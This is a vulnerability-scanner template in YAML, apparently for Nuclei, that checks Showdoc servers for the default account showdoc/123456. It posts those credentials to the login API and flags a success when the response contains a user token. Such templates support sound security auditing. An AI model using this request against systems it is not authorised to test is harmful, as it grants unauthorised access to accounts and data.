id: showdoc-default-login

info:
  name: Showdoc Default Login
  author: pikpikcu
  severity: medium
  reference:
    - https://blog.star7th.com/2016/05/2007.html
  tags: showdoc,default-login

requests:
  - raw:
      - |
        POST /server/index.php?s=/api/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        username={{username}}&password={{password}}&v_code=

    payloads:
      username:
        - showdoc
      password:
        - 123456
    attack: pitchfork

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"username":"showdoc"'
          - '"user_token":'
        condition: and

      - type: status
        status:
          - 200
